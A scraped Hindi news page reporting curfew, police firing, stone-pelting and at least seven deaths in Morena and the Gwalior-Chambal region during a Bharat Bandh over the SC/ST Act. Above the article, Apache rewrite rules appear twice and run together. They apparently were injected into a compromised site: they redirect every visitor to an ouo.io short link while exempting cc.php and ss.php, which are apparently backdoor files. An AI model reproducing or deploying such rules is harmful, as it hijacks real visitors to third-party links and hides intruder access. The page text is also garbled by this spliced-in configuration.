
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 573
Previousमुरैना। मध्य प्रदेश के मुरैना जिले में कर्फ्यू के बावजूद हिंसा थमने का नाम नहीं ले रही है। आज लगातार दूसरे दिन उपद्रवियों ने पुलिस दल पर पथराव और फायरिंग की है। इसके बाद पुलिस ने सख्ती बरतते हुए कई लोगों को हिरासत में लिया है। भारत बंद के दौरान हुई हिंसा के बाद दूसरे दिन भी मुरैना में हालात तनावपूर्ण बने हुए हैं। शहर के उत्तम पुरा इलाके में मंगलवार सुबह एक बार फिर हिंसा भड़क उठी। यहां पेट्रोलिंग कर रही पुलिस टीम पर पथराव के बाद फायरिंग भी हुई। जवाब में पुलिस को भी फायरिंग करनी पड़ी।
इस वजह से कुछ देर के लिए पुलिस को पीछे हटना पड़ा। बाद में अतिरिक्त पुलिस बल के साथ इलाके में पुलिस ने सर्चिंग अभियान शुरू किया और बड़ी संख्या में उपद्रवियों को गिरफ्तार किया है। एससी/एसटी कानून को कमजोर करने वाले सर्वोच्च न्यायालय के आदेश के खिलाफ कल आहूत भारत बंद के दौरान मध्य प्रदेश के ग्वालियर-चंबल जिलों में कई स्थानों पर भड़की हिंसा में कम से कम 7 लोगों की मौत हो गई है और कई अन्य घायल हो गए हैं।
हिंसा को देखते हुए राज्य के कई हिस्सों में कर्फ्यू लगा दिया गया है और इंटरनेट सेवा निलंबित कर दी गई है।